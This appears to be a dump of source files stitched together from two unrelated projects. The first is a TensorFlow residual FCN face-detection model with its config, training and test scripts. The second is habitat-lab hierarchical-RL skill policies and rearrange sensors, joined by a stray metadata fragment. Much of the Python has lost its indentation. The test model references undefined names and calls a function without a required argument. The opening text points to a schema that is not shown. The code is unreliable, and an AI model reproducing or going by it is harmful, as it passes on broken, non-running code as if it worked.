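For reference, a record matching the schema parsed above could be produced roughly as follows; this is a sketch assuming TensorFlow 1.x, with field names mirroring the `parse_single_example` spec (the file name and array contents are placeholders).
```python
import numpy as np
import tensorflow as tf
def write_example(writer, image, label, name):
    # Flatten the arrays and store their shapes so the reader can reshape them back.
    feature = {
        'image': tf.train.Feature(float_list=tf.train.FloatList(value=image.ravel())),
        'image_shape': tf.train.Feature(int64_list=tf.train.Int64List(value=image.shape)),
        'label': tf.train.Feature(float_list=tf.train.FloatList(value=label.ravel())),
        'label_shape': tf.train.Feature(int64_list=tf.train.Int64List(value=label.shape)),
        'name': tf.train.Feature(bytes_list=tf.train.BytesList(value=[name.encode()])),
    }
    example = tf.train.Example(features=tf.train.Features(feature=feature))
    writer.write(example.SerializeToString())
with tf.python_io.TFRecordWriter('example.tfrecords') as writer:
    write_example(writer,
                  np.zeros((512, 512, 3), np.float32),
                  np.zeros((512, 512, 1), np.float32),
                  'sample_0')
```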
#### File: Detection/code/resfcn_config.py
```python
import os
import shutil
import logging
from datetime import datetime
import tensorflow as tf
version = 'v0.1.0.20170110'
run = '1_0'
time_stamp = datetime.now().strftime('%Y-%m-%d_%H_%M')
is_training = True
# tf config
gpu_device = '5'
session_config = tf.ConfigProto(log_device_placement=False,gpu_options=tf.GPUOptions(allow_growth=True))
# resfcn_train
data_dir = '/data-disk/gujy/Face/WF/tf_records'
train_dir = os.path.join('/data-disk/gujy/Face/train',version,run)
resume = True
restore_path = '/data-disk/gujy/Face/train/v0.0.0.20161217/adam/3_0/checkpoint/model.ckpt-43000'
# restore_path = None
max_steps = 1e6
num_steps_debug = 20
num_steps_summary = 100
num_steps_checkpoint = 250
# resfcn_model
CONV_STDDEV = None
BIAS_STDDEV = 0.0
DECONV_STDDEV = None
## Weight decay
CONV_WD = 1e-8
BIAS_WD = None
DECONV_WD = 1e-8
# training setting
learning_rate = 1e-4
# optimizer = tf.train.GradientDescentOptimizer
optimizer = tf.train.AdamOptimizer
# resfcn_input
IMAGE_SIZE = [512,512,3]
LABEL_SIZE = [512,512,1]
CROP_SIZE = [512,512,4]
neg_add_w = 0.1
input_threads = 4
batch_size = 4
tfrecords = [os.path.join(data_dir,tfrecord) for tfrecord in os.listdir(data_dir)]
num_examples_per_epoch = 12880-362
num_batches_per_epoch = int(num_examples_per_epoch/batch_size)
# whether to new a folder
if not os.path.isdir(train_dir):
os.makedirs(os.path.join(train_dir,'fig'))
os.makedirs(os.path.join(train_dir,'checkpoint'))
os.makedirs(os.path.join(train_dir,'summary'))
os.makedirs(os.path.join(train_dir,'log'))
shutil.copy('resfcn_config.py',os.path.join(train_dir,'log','%s.config'%time_stamp))
shutil.copy('resfcn_model.py',os.path.join(train_dir,'log','%s.model'%time_stamp))
log_file = os.path.join(train_dir,'log','%s.log'%time_stamp)
# logger config
logger = logging.getLogger('mylog')
logger.propagate = False
logger.setLevel(logging.DEBUG)
fmt = logging.Formatter('%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s')
fileHandler = logging.FileHandler(log_file)
fileHandler.setLevel(logging.DEBUG)
fileHandler.setFormatter(fmt)
consoleHandler = logging.StreamHandler()
consoleHandler.setLevel(logging.INFO)
consoleHandler.setFormatter(fmt)
logger.addHandler(fileHandler)
logger.addHandler(consoleHandler)
def close_all():
fileHandler.close()
consoleHandler.close()
```
#### File: Detection/code/resfcn_train.py
```python
from datetime import datetime
import time
import os.path
import sys
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
import resfcn_config as config
from resfcn_config import logger
import resfcn_model as resfcn
import resfcn_input
def train():
global_step = tf.Variable(0, trainable=False)
learning_rate = tf.constant(config.learning_rate)
# Get images and labels for FCN.
images,labels,pos_ws,neg_ws,names = resfcn_input.inputs()
print('inputs initialize.')
# Build a Graph that computes the score map predictions from the
# inference model.
preds = resfcn.inference(images)
# tf.image_summary('preds',preds[:,:,:,int(config.LABEL_SIZE[-1]/2)],max_images=int(config.batch_size/2))
print('inference initialize.')
# Calculate loss.
loss, pos_loss, neg_loss = resfcn.loss(preds, labels, pos_ws, neg_ws)
print('loss initialize.')
# Build a Graph that trains the model with one batch of examples and
# updates the model parameters.
train_op = resfcn.train(loss, global_step,learning_rate,optimizer=config.optimizer)
print('train initialize.')
# Create a saver.
saver = tf.train.Saver(tf.all_variables(),max_to_keep=100,name='saver')
print('saver initialize.')
# Build the summary op
summary_loss_op = tf.merge_all_summaries(key='LOSS_OP')
summary_param_op = tf.merge_all_summaries(key='PARAM_OP')
# Build an initialization operation to run below.
init = tf.initialize_all_variables()
# Start running operations on the Graph.
sess = tf.Session(config=config.session_config)
sess.run(init)
print('session initialize.')
if config.resume:
if not config.restore_path:
restore_path = tf.train.latest_checkpoint(os.path.join(config.train_dir,'checkpoint'))
if not restore_path:
print('no checkpoint to continue.')
sys.exit(1)
saver.restore(sess,restore_path)
logger.info('continue from %s',restore_path)
else:
saver.restore(sess,config.restore_path)
logger.info('global step is set to %d',sess.run(tf.assign(global_step,0)))
logger.info('learning rate is set to %.3f',sess.run(learning_rate))
logger.info('restart from %s',config.restore_path)
optimizer_scope = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES,"scope/prefix/for/optimizer")
sess.run(tf.initialize_variables(optimizer_scope))
summary_writer = tf.train.SummaryWriter(os.path.join(config.train_dir,'summary'),sess.graph)
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess=sess,coord=coord)
print('training begins.')
step = sess.run(global_step)
try:
while step<config.max_steps:
sess_input = [train_op,loss]
if step%config.num_steps_debug==0:
sess_input.append(preds)
sess_input.append(images)
sess_input.append(labels)
sess_input.append(names)
sess_input.append(pos_loss)
sess_input.append(neg_loss)
sess_input.append(summary_loss_op)
if step%config.num_steps_summary==0:
sess_input.append(summary_param_op)
start_time = time.time()
sess_output = sess.run(sess_input)
duration = time.time() - start_time
assert not np.isnan(sess_output[1]),'Model with loss = nan.'
num_examples_per_step = config.batch_size
examples_per_sec = num_examples_per_step / duration
sec_per_batch = float(duration)
format_str = ('%s: step %d, loss = %.8f (%.1f examples/sec; %.3f sec/batch)')
print (format_str % (datetime.now().strftime('%H:%M:%S'),
step, sess_output[1], examples_per_sec, sec_per_batch))
if step % config.num_steps_debug==0:
format_str = ('epoch %d, pos_loss = %.8f, neg_loss = %.8f')
print(format_str % (int(step/config.num_batches_per_epoch),
sess_output[6],sess_output[7]))
summary_writer.add_summary(sess_output[8],step)
ind = int(step%(2*config.num_steps_debug)==0)*int(config.batch_size/2)
plt.subplot(131)
plt.imshow(128-128*sess_output[3][ind,:,:,:])
plt.subplot(132)
plt.imshow(sess_output[4][ind,:,:,int(config.LABEL_SIZE[-1]/2)])
plt.title(sess_output[5][ind].decode())
plt.subplot(133)
plt.imshow(sess_output[2][ind,:,:,int(config.LABEL_SIZE[-1]/2)])
# plt.show()
plt.savefig(os.path.join(config.train_dir,'fig/pred%d.png'%step))
# Summary the training process.
if step % config.num_steps_summary == 0:
summary_str = sess_output[-1]
summary_writer.add_summary(summary_str,step)
if step % config.num_steps_checkpoint == 0:
checkpoint_path = os.path.join(config.train_dir,'checkpoint','model.ckpt')
saver.save(sess, checkpoint_path, global_step=step)
step=sess.run(global_step)
except tf.errors.OutOfRangeError:
print('Running %d steps.'%step)
finally:
coord.request_stop()
coord.join(threads)
sess.close()
config.close_all()
def main(argv=None): # pylint: disable=unused-argument
os.environ['CUDA_VISIBLE_DEVICES'] = config.gpu_device
train()
if __name__ == '__main__':
tf.app.run()
```
#### File: code/test/resfcn_test.py
```python
import sys
import os.path
from datetime import datetime
import time
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
import test_config as config
from test_config import logger
import test_model as resfcn
import test_input
def test():
    inputs = test_input.TEST_INPUT()
    # Get images and labels for FCN.
    image = tf.placeholder(tf.float32,shape=[None,None,config.IMAGE_SIZE[2]],name='image_placeholder')
precrop = tf.image.resize_image_with_crop_or_pad(image,900,1600)
crop = tf.image.resize_images(precrop,[450,800])
images = tf.expand_dims(crop,0)
images = (images-128)/128
print('inputs initialize.')
# Build a Graph that computes the score map predictions from the
# inference model.
preds = resfcn.inference(images)
# tf.image_summary('preds',preds[:,:,:,int(config.LABEL_SIZE[-1]/2)],max_images=int(config.batch_size/2))
print('inference initialize.')
# Create a saver.
saver = tf.train.Saver(tf.all_variables(),name='saver')
print('saver initialize.')
# Start running operations on the Graph.
sess = tf.Session(config=config.session_config)
saver.restore(sess,config.restore_path)
logger.info('load from %s',config.restore_path)
print('test begins.')
while inputs.isValid:
# try:
scan_time = datetime.now().strftime('%H:%M')
image_batch = inputs.next_fig()
# except Exception:
# logger.info('encounter with error. Abort fig %s.'%inputs.figName)
# inputs.next_fig()
# continue
start_time = time.time()
crop_image,heatmap = sess.run([crop,preds],feed_dict = {image:image_batch})
duration = time.time() - start_time
# num_examples_per_step = inputs.batch_size
# examples_per_sec = num_examples_per_step / duration
# sec_per_batch = float(duration)
format_str = ('%s: %s (%.3f sec/fig)')
print (format_str % (scan_time, inputs.figName, duration))
inputs.save(crop_image,heatmap)
sess.close()
config.close_all()
def main(argv=None): # pylint: disable=unused-argument
os.environ['CUDA_VISIBLE_DEVICES'] = config.gpu_device
test()
if __name__ == '__main__':
tf.app.run()
```
#### File: code/test/test_input.py
```python
import os
import random
import numpy as np
from scipy import ndimage
from scipy import misc
import scipy.io as sio
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
# from matplotlib.patches import Rectangle
import tensorflow as tf
import test_config as config
from test_config import logger
class TEST_INPUT:
def __init__(self):
self.batch_size = config.batch_size
self.fig_list = os.listdir(config.test_dir)
self.curFig = -1
self.figName = None
self.numFig = len(self.fig_list)
self.isValid = self.numFig>0
def next_fig(self):
if self.isValid == False:
return None
self.curFig += 1
if self.curFig+1>=self.numFig:
self.isValid = False
filename = self.fig_list[self.curFig]
self.image = mpimg.imread(os.path.join(config.test_dir,filename))
self.image = misc.imresize(self.image,0.8)
# plt.imshow(self.image)
# plt.show()
# image = np.expand_dims(image,0)
self.figName,_ = os.path.splitext(filename)
return self.image
def save(self,image,heatmap):
heatmap = np.squeeze(heatmap)
conn,numCandidate = ndimage.label(heatmap>=config.thresh)
candis = ndimage.find_objects(conn)
# plt.imshow(256-image)
# plt.show()
for candi in candis:
image[candi[0].start:candi[0].stop,candi[1].start,0]= 0
image[candi[0].start:candi[0].stop,candi[1].start,1]= 255
image[candi[0].start:candi[0].stop,candi[1].start,2]= 0
image[candi[0].start:candi[0].stop,candi[1].stop-1,0]= 0
image[candi[0].start:candi[0].stop,candi[1].stop-1,1]= 255
image[candi[0].start:candi[0].stop,candi[1].stop-1,2]= 0
image[candi[0].start,candi[1].start:candi[1].stop,0] = 0
image[candi[0].start,candi[1].start:candi[1].stop,1] = 255
image[candi[0].start,candi[1].start:candi[1].stop,2] = 0
image[candi[0].stop-1,candi[1].start:candi[1].stop,0] = 0
image[candi[0].stop-1,candi[1].start:candi[1].stop,1] = 255
            image[candi[0].stop-1,candi[1].start:candi[1].stop,2] = 0
            # ly = candi[0].start
# height = candi[0].stop-candi[0].start
# lx = candi[1].start
# width = candi[1].stop-candi[1].start
# plt.gca.add_patch(Rectangle((lx,ly),width,height,fill=None,alpha=1))
image = 256-image
mpimg.imsave(os.path.join(config.output_dir,'pred','%s_bbxs.jpg'%self.figName),image)
mpimg.imsave(os.path.join(config.output_dir,'pred','%s_heatmap.jpg'%self.figName),heatmap)
```
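The box extraction in `save` works by labeling the thresholded heatmap and taking the bounding slices of each connected component; a small self-contained illustration (the threshold value here is made up) is:
```python
import numpy as np
from scipy import ndimage
heatmap = np.zeros((8, 8))
heatmap[1:3, 1:4] = 0.9   # one blob above threshold
heatmap[5:7, 5:7] = 0.8   # a second blob
conn, num_candidates = ndimage.label(heatmap >= 0.5)
for sl in ndimage.find_objects(conn):
    print('rows', sl[0].start, sl[0].stop, 'cols', sl[1].start, sl[1].stop)
# rows 1 3 cols 1 4
# rows 5 7 cols 5 7
```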
#### File: code/test/test_model.py
```python
import os
import sys
import numpy as np
import tensorflow as tf
import test_input
import test_config as config
from test_config import logger
# Global constants describing the Residue FCN model.
## Standard deviation for initialization
CONV_STDDEV = config.CONV_STDDEV
BIAS_STDDEV = config.BIAS_STDDEV
DECONV_STDDEV = config.DECONV_STDDEV
## Weight decay
CONV_WD = config.CONV_WD
BIAS_WD = config.BIAS_WD
DECONV_WD = config.DECONV_WD
def _get_variable(name, shape, initializer,
weight_decay=None,dtype=tf.float32,trainable=True):
# Optionally add weigth decay according to weight_decay
if weight_decay is not None:
regularizer = tf.contrib.layers.l2_regularizer(weight_decay)
else:
regularizer = None
var = tf.get_variable(name=name,shape=shape,
initializer=initializer,dtype=dtype,
regularizer=regularizer,trainable=trainable)
return var
def _get_filter_stddev(kernel_size,channel_size):
filter_stddev = np.sqrt(2.0/(kernel_size[0]*kernel_size[1]*channel_size))
return filter_stddev
def _conv2d(input_op, kernel_shape, op_name='conv2d',
stride = None, padding='SAME',
conv_stddev = CONV_STDDEV, conv_wd=CONV_WD):
if conv_stddev is None:
conv_stddev = _get_filter_stddev(kernel_shape[0:2],kernel_shape[2])
if stride is None:
stride = [1, 1, 1, 1]
kernel = _get_variable(name='conv_kernel',shape=kernel_shape,
initializer=tf.truncated_normal_initializer(stddev=conv_stddev),
weight_decay=conv_wd)
conv = tf.nn.conv2d(input_op, kernel, strides=stride, padding=padding,name=op_name)
return conv
def _conv2d_bias(input_op, kernel_shape, op_name='conv2d_bias',
stride = None, padding='SAME',
conv_stddev = CONV_STDDEV, conv_wd=CONV_WD,
bias_stddev = BIAS_STDDEV, bias_wd=BIAS_WD):
with tf.variable_scope(op_name) as scope:
conv = _conv2d(input_op, kernel_shape,
stride=stride, padding=padding,
conv_stddev = conv_stddev, conv_wd=conv_wd)
bias = _get_variable('bias',shape=kernel_shape[3],
initializer=tf.truncated_normal_initializer(stddev=bias_stddev),weight_decay=bias_wd)
conv_bias = tf.nn.bias_add(conv, bias, name='conv2d_bias')
return conv_bias
def _batch_norm(input_op,channel_size,op_name='batch_norm'):
with tf.variable_scope(op_name) as scope:
offset = _get_variable(name='offset',shape=channel_size,initializer=tf.zeros_initializer)
        scale = _get_variable(name='scale',shape=channel_size,initializer=tf.ones_initializer)
moving_mean = tf.get_variable(name='moving_mean',shape=channel_size,
initializer=tf.zeros_initializer,trainable=False)
moving_variance = tf.get_variable(name='moving_variance',shape=channel_size,
            initializer=tf.ones_initializer,trainable=False)
mean,variance = tf.nn.moments(input_op,axes=[0,1,2])
update_moving_mean = moving_averages.assign_moving_average(moving_mean,mean,MOVING_AVERAGE_DECAY)
update_moving_variance = moving_averages.assign_moving_average(moving_variance,variance,MOVING_AVERAGE_DECAY)
tf.add_to_collection('UPDATE_OP',update_moving_mean)
tf.add_to_collection('UPDATE_OP',update_moving_variance)
        if config.is_training:
            norm = tf.nn.batch_normalization(input_op,moving_mean,moving_variance,offset,scale,BN_EPSILON)
        else:
            norm = tf.nn.batch_normalization(input_op,mean,variance,offset,scale,BN_EPSILON)
return norm
def _conv_layer(input_op, kernel_shape, op_name='conv_layer',
stride=None, padding='SAME',
batch_norm=False, activation=tf.nn.elu,
conv_stddev = CONV_STDDEV, conv_wd=CONV_WD,
bias_stddev = BIAS_STDDEV, bias_wd=BIAS_WD):
with tf.variable_scope(op_name) as scope:
pre_activation = _conv2d_bias(input_op, kernel_shape, stride=stride, padding=padding,
conv_stddev = conv_stddev, conv_wd=conv_wd, bias_stddev = bias_stddev, bias_wd=bias_wd)
if batch_norm:
pre_activation = _batch_norm(pre_activation)
if activation is not None:
conv = activation(pre_activation)
else:
conv = pre_activation
if config.is_training:
print('conv layer:%s is established'%op_name)
logger.debug(str(conv))
return conv
def _deconv_layer(input_op, kernel_shape, shape_op, op_name='deconv_layer',
stride=None, padding='SAME',
deconv_stddev=DECONV_STDDEV, deconv_wd=DECONV_WD):
if deconv_stddev is None:
deconv_stddev = _get_filter_stddev(kernel_shape[0:2],kernel_shape[3])
if stride is None:
stride = [1,2,2,1]
with tf.variable_scope(op_name) as scope:
kernel = _get_variable(name='deconv_kernel', shape = kernel_shape,
initializer=tf.truncated_normal_initializer(stddev=deconv_stddev),
weight_decay=deconv_wd)
deconv = tf.nn.conv2d_transpose(input_op, kernel,
output_shape= shape_op,
strides=stride, padding=padding,name='deconv')
if config.is_training:
print('deconv layer:%s is established...'%op_name)
logger.debug(str(deconv))
return deconv
def _pool_layer(input_op, op_name='pool_layer', pooling=tf.nn.max_pool):
with tf.variable_scope(op_name) as scope:
pool = pooling(input_op, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
if config.is_training:
print('pool layer:%s is established...'%op_name)
logger.debug(str(pool))
return pool
def _unpool_layer(input_op, size=None, op_name='unpool_layer'):
if size is None:
size = 2*(tf.shape(input_op)[1:3])
with tf.variable_scope(op_name) as scope:
unpool = tf.image.resize_images(input_op, size=size)
if config.is_training:
print('unpool layer:%s is established...'%op_name)
logger.debug(str(unpool))
return unpool
def _residue_block(input_op, residue_op, kernel_shape,
op_name='residue_block', activation=tf.nn.elu, batch_norm=False,
conv_stddev = CONV_STDDEV, conv_wd=CONV_WD,
bias_stddev = BIAS_STDDEV, bias_wd=BIAS_WD):
with tf.variable_scope(op_name) as scope:
conv1 = _conv_layer(input_op,kernel_shape,op_name='residue_conv1',
batch_norm=batch_norm, activation=activation,
conv_stddev = conv_stddev, bias_stddev = bias_stddev,
conv_wd=conv_wd, bias_wd=bias_wd)
conv2 = _conv_layer(input_op,kernel_shape,op_name='residue_conv2',
batch_norm=batch_norm, activation=None,
conv_stddev = conv_stddev, bias_stddev = bias_stddev,
conv_wd=conv_wd, bias_wd=bias_wd)
addition = tf.add(residue_op,conv2,name='addition')
if activation is not None:
residue = activation(addition)
else:
residue = addition
if config.is_training:
print('residue block:%s is established...'%op_name)
logger.debug(str(residue))
return residue
def inference(images):
# Convolution
# stage1
conv1_1 = _conv_layer(input_op=images, op_name='conv1_1', kernel_shape=[1,1,images.get_shape().as_list()[-1],32])
block1_1 = _residue_block(input_op=conv1_1,residue_op=conv1_1, op_name='block1_1', kernel_shape=[3,3,32,32])
block1_2 = _residue_block(input_op=block1_1,residue_op=block1_1, op_name='block1_2', kernel_shape=[3,3,32,32])
pool1 = _pool_layer(block1_2,'pool1')
# stage2
conv2_1 = _conv_layer(input_op=pool1, op_name='conv2_1', kernel_shape=[1,1,32,64])
block2_1 = _residue_block(input_op=conv2_1,residue_op=conv2_1, op_name='block2_1', kernel_shape=[3,3,64,64])
block2_2 = _residue_block(input_op=block2_1,residue_op=block2_1, op_name='block2_2', kernel_shape=[3,3,64,64])
pool2 = _pool_layer(block2_2,'pool2')
# stage3
conv3_1 = _conv_layer(input_op=pool2, op_name='conv3_1', kernel_shape=[1,1,64,128])
block3_1 = _residue_block(input_op=conv3_1,residue_op=conv3_1, op_name='block3_1', kernel_shape=[3,3,128,128])
block3_2 = _residue_block(input_op=block3_1,residue_op=block3_1, op_name='block3_2', kernel_shape=[3,3,128,128])
pool3 = _pool_layer(block3_2,'pool3')
# stage4
conv4_1 = _conv_layer(input_op=pool3, op_name='conv4_1', kernel_shape=[1,1,128,256])
block4_1 = _residue_block(input_op=conv4_1,residue_op=conv4_1, op_name='block4_1', kernel_shape=[3,3,256,256])
block4_2 = _residue_block(input_op=block4_1,residue_op=block4_1, op_name='block4_2', kernel_shape=[3,3,256,256])
pool4 = _pool_layer(block4_2,'pool4')
# stage5
conv5_1 = _conv_layer(input_op=pool4, op_name='conv5_1', kernel_shape=[1,1,256,512])
block5_1 = _residue_block(input_op=conv5_1,residue_op=conv5_1, op_name='block5_1', kernel_shape=[3,3,512,512])
block5_2 = _residue_block(input_op=block5_1,residue_op=block5_1, op_name='block5_2', kernel_shape=[3,3,512,512])
# upsample and fuse
deconv4_1 = _deconv_layer(input_op=block5_2, op_name='deconv4_1',
shape_op= tf.shape(block4_2), kernel_shape=[2,2,256,512])
block4_3 = _residue_block(input_op=deconv4_1,residue_op=block4_2, op_name='block4_3', kernel_shape=[3,3,256,256])
block4_4 = _residue_block(input_op=block4_3,residue_op=block4_3, op_name='block4_4', kernel_shape=[3,3,256,256])
deconv3_1 = _deconv_layer(input_op=block4_4, op_name='deconv3_1',
shape_op= tf.shape(block3_2), kernel_shape=[2,2,128,256])
block3_3 = _residue_block(input_op=deconv3_1,residue_op=block3_2, op_name='block3_3', kernel_shape=[3,3,128,128])
block3_4 = _residue_block(input_op=block3_3,residue_op=block3_3, op_name='block3_4', kernel_shape=[3,3,128,128])
deconv2_1 = _deconv_layer(input_op=block3_4, op_name='deconv2_1',
shape_op= tf.shape(block2_2), kernel_shape=[2,2,64,128])
block2_3 = _residue_block(input_op=deconv2_1,residue_op=block2_2, op_name='block2_3', kernel_shape=[3,3,64,64])
block2_4 = _residue_block(input_op=block2_3,residue_op=block2_3, op_name='block2_4', kernel_shape=[3,3,64,64])
deconv1_1 = _deconv_layer(input_op=block2_4, op_name='deconv1_1',
shape_op= tf.shape(block1_2), kernel_shape=[2,2,32,64])
block1_3 = _residue_block(input_op=deconv1_1,residue_op=block1_2, op_name='block1_3', kernel_shape=[3,3,32,32])
block1_4 = _residue_block(input_op=block1_3,residue_op=block1_3, op_name='block1_4', kernel_shape=[3,3,32,32])
conv1_3 = _conv2d_bias(input_op=block1_4, kernel_shape = [1,1,32,1], op_name='conv1_3')
# sigmoid
preds = tf.sigmoid(conv1_3,name='pred')
#conv1_3 = _conv_layer(input_op=block1_4, op_name='conv1_3', kernel_shape=[3,3,32,1])
#conv1_4 = _conv_layer(input_op=block1_4, op_name='conv1_4', kernel_shape=[3,3,32,1])
## softmax
#with tf.variable_scope('pred') as scope:
#pred1 = tf.exp(conv1_3,name='pred1')
#pred2 = tf.exp(conv1_4,name='pred2')
#preds = tf.truediv(pred1,tf.add(pred1,pred2),name='softmax')
return preds
```
{
"source": "Jiayuan-Gu/habitat-lab",
"score": 2
} |
#### File: hrl/skills/art_obj.py
```python
from typing import List, Tuple
import torch
from habitat.tasks.rearrange.rearrange_sensors import (
IsHoldingSensor,
RelativeRestingPositionSensor,
)
from habitat_baselines.rl.hrl.skills.nn_skill import NnSkillPolicy
class ArtObjSkillPolicy(NnSkillPolicy):
def on_enter(
self,
skill_arg: List[str],
batch_idx: int,
observations,
rnn_hidden_states,
prev_actions,
) -> Tuple[torch.Tensor, torch.Tensor]:
super().on_enter(
skill_arg, batch_idx, observations, rnn_hidden_states, prev_actions
)
self._did_leave_start_zone = torch.zeros(
self._batch_size, device=prev_actions.device
)
self._episode_start_resting_pos = observations[
RelativeRestingPositionSensor.cls_uuid
]
def _is_skill_done(
self,
observations,
rnn_hidden_states,
prev_actions,
masks,
) -> torch.BoolTensor:
cur_resting_pos = observations[RelativeRestingPositionSensor.cls_uuid]
did_leave_start_zone = (
torch.norm(
cur_resting_pos - self._episode_start_resting_pos, dim=-1
)
> self._config.START_ZONE_RADIUS
)
self._did_leave_start_zone = torch.logical_or(
self._did_leave_start_zone, did_leave_start_zone
)
cur_resting_dist = torch.norm(
observations[RelativeRestingPositionSensor.cls_uuid], dim=-1
)
is_within_thresh = cur_resting_dist < self._config.AT_RESTING_THRESHOLD
is_holding = (
observations[IsHoldingSensor.cls_uuid].view(-1).type(torch.bool)
)
is_not_holding = ~is_holding
return is_not_holding & is_within_thresh & self._did_leave_start_zone
def _parse_skill_arg(self, skill_arg):
self._internal_log(f"Parsing skill argument {skill_arg}")
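        # The last skill argument is expected to look like "<target>|<index>"; keep the integer index.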
return int(skill_arg[-1].split("|")[1])
```
#### File: hrl/skills/nn_skill.py
```python
import gym.spaces as spaces
import numpy as np
import torch
from habitat.config import Config as CN
from habitat.core.spaces import ActionSpace
from habitat_baselines.common.baseline_registry import baseline_registry
from habitat_baselines.common.logging import baselines_logger
from habitat_baselines.common.tensor_dict import TensorDict
from habitat_baselines.rl.hrl.skills.skill import SkillPolicy
from habitat_baselines.utils.common import get_num_actions
def truncate_obs_space(space: spaces.Box, truncate_len: int) -> spaces.Box:
"""
    Returns a copy of the observation space truncated to its first `truncate_len` elements.
"""
return spaces.Box(
low=space.low[..., :truncate_len],
high=space.high[..., :truncate_len],
dtype=np.float32,
)
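# Example (hypothetical): truncate_obs_space(spaces.Box(-1.0, 1.0, (5,), np.float32), 3)
# yields a Box of shape (3,), keeping only the first three dimensions.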
class NnSkillPolicy(SkillPolicy):
"""
Defines a skill to be used in the TP+SRL baseline.
"""
def __init__(
self,
wrap_policy,
config,
action_space: spaces.Space,
filtered_obs_space: spaces.Space,
filtered_action_space: spaces.Space,
batch_size,
should_keep_hold_state: bool = False,
):
"""
:param action_space: The overall action space of the entire task, not task specific.
"""
super().__init__(
config, action_space, batch_size, should_keep_hold_state
)
self._wrap_policy = wrap_policy
self._filtered_obs_space = filtered_obs_space
self._filtered_action_space = filtered_action_space
self._ac_start = 0
self._ac_len = get_num_actions(filtered_action_space)
for k, space in action_space.items():
if k not in filtered_action_space.spaces.keys():
self._ac_start += get_num_actions(space)
else:
break
self._internal_log(
f"Skill {self._config.skill_name}: action offset {self._ac_start}, action length {self._ac_len}"
)
def parameters(self):
if self._wrap_policy is not None:
return self._wrap_policy.parameters()
else:
return []
@property
def num_recurrent_layers(self):
if self._wrap_policy is not None:
return self._wrap_policy.net.num_recurrent_layers
else:
return 0
def to(self, device):
super().to(device)
if self._wrap_policy is not None:
self._wrap_policy.to(device)
def _get_filtered_obs(self, observations, cur_batch_idx) -> TensorDict:
return TensorDict(
{
k: observations[k]
for k in self._filtered_obs_space.spaces.keys()
}
)
def _internal_act(
self,
observations,
rnn_hidden_states,
prev_actions,
masks,
cur_batch_idx,
deterministic=False,
):
filtered_obs = self._get_filtered_obs(observations, cur_batch_idx)
filtered_prev_actions = prev_actions[
:, self._ac_start : self._ac_start + self._ac_len
]
filtered_obs = self._select_obs(filtered_obs, cur_batch_idx)
_, action, _, rnn_hidden_states = self._wrap_policy.act(
filtered_obs,
rnn_hidden_states,
filtered_prev_actions,
masks,
deterministic,
)
        full_action = torch.zeros(prev_actions.shape, device=prev_actions.device)
full_action[:, self._ac_start : self._ac_start + self._ac_len] = action
return full_action, rnn_hidden_states
@classmethod
def from_config(cls, config, observation_space, action_space, batch_size):
# Load the wrap policy from file
if len(config.LOAD_CKPT_FILE) == 0:
raise ValueError(
f"Skill {config.skill_name}: Need to specify LOAD_CKPT_FILE"
)
ckpt_dict = torch.load(config.LOAD_CKPT_FILE, map_location="cpu")
policy = baseline_registry.get_policy(config.name)
policy_cfg = ckpt_dict["config"]
if "GYM" not in policy_cfg.TASK_CONFIG:
# Support loading legacy policies
# TODO: Remove this eventually and drop support for policies
# trained on older version of codebase.
policy_cfg.defrost()
policy_cfg.TASK_CONFIG.GYM = CN()
policy_cfg.TASK_CONFIG.GYM.OBS_KEYS = list(
set(
policy_cfg.RL.POLICY.include_visual_keys
+ policy_cfg.RL.GYM_OBS_KEYS
)
)
policy_cfg.freeze()
expected_obs_keys = policy_cfg.TASK_CONFIG.GYM.OBS_KEYS
filtered_obs_space = spaces.Dict(
{k: observation_space.spaces[k] for k in expected_obs_keys}
)
for k in config.OBS_SKILL_INPUTS:
space = filtered_obs_space.spaces[k]
# There is always a 3D position
filtered_obs_space.spaces[k] = truncate_obs_space(space, 3)
baselines_logger.debug(
f"Skill {config.skill_name}: Loaded observation space {filtered_obs_space}",
)
filtered_action_space = ActionSpace(
{
k: action_space[k]
for k in policy_cfg.TASK_CONFIG.TASK.POSSIBLE_ACTIONS
}
)
if "ARM_ACTION" in filtered_action_space.spaces and (
policy_cfg.TASK_CONFIG.TASK.ACTIONS.ARM_ACTION.GRIP_CONTROLLER
is None
):
filtered_action_space["ARM_ACTION"] = spaces.Dict(
{
k: v
for k, v in filtered_action_space["ARM_ACTION"].items()
if k != "grip_action"
}
)
baselines_logger.debug(
f"Loaded action space {filtered_action_space} for skill {config.skill_name}",
)
actor_critic = policy.from_config(
policy_cfg, filtered_obs_space, filtered_action_space
)
try:
actor_critic.load_state_dict(
{ # type: ignore
k[len("actor_critic.") :]: v
for k, v in ckpt_dict["state_dict"].items()
}
)
except Exception as e:
raise ValueError(
f"Could not load checkpoint for skill {config.skill_name} from {config.LOAD_CKPT_FILE}"
) from e
return cls(
actor_critic,
config,
action_space,
filtered_obs_space,
filtered_action_space,
batch_size,
)
```
#### File: hrl/skills/wait.py
```python
from typing import Any
import gym.spaces as spaces
import torch
from habitat_baselines.rl.hrl.skills.skill import SkillPolicy
class WaitSkillPolicy(SkillPolicy):
def __init__(
self,
config,
action_space: spaces.Space,
batch_size,
):
super().__init__(config, action_space, batch_size, True)
self._wait_time = -1
def _parse_skill_arg(self, skill_arg: str) -> Any:
self._wait_time = int(skill_arg[0])
self._internal_log(f"Requested wait time {self._wait_time}")
def _is_skill_done(
self,
observations,
rnn_hidden_states,
prev_actions,
masks,
) -> torch.BoolTensor:
assert self._wait_time > 0
return self._cur_skill_step >= self._wait_time
def _internal_act(
self,
observations,
rnn_hidden_states,
prev_actions,
masks,
cur_batch_idx,
deterministic=False,
):
action = torch.zeros(prev_actions.shape, device=prev_actions.device)
return action, rnn_hidden_states
```
#### File: tasks/rearrange/rearrange_sensors.py
```python
import numpy as np
from gym import spaces
from habitat.core.embodied_task import Measure
from habitat.core.registry import registry
from habitat.core.simulator import Sensor, SensorTypes
from habitat.tasks.nav.nav import PointGoalSensor
from habitat.tasks.rearrange.rearrange_sim import RearrangeSim
from habitat.tasks.rearrange.utils import (
CollisionDetails,
batch_transform_point,
rearrange_logger,
)
from habitat.tasks.utils import cartesian_to_polar, get_angle
class MultiObjSensor(PointGoalSensor):
"""
Abstract parent class for a sensor that specifies the locations of all targets.
"""
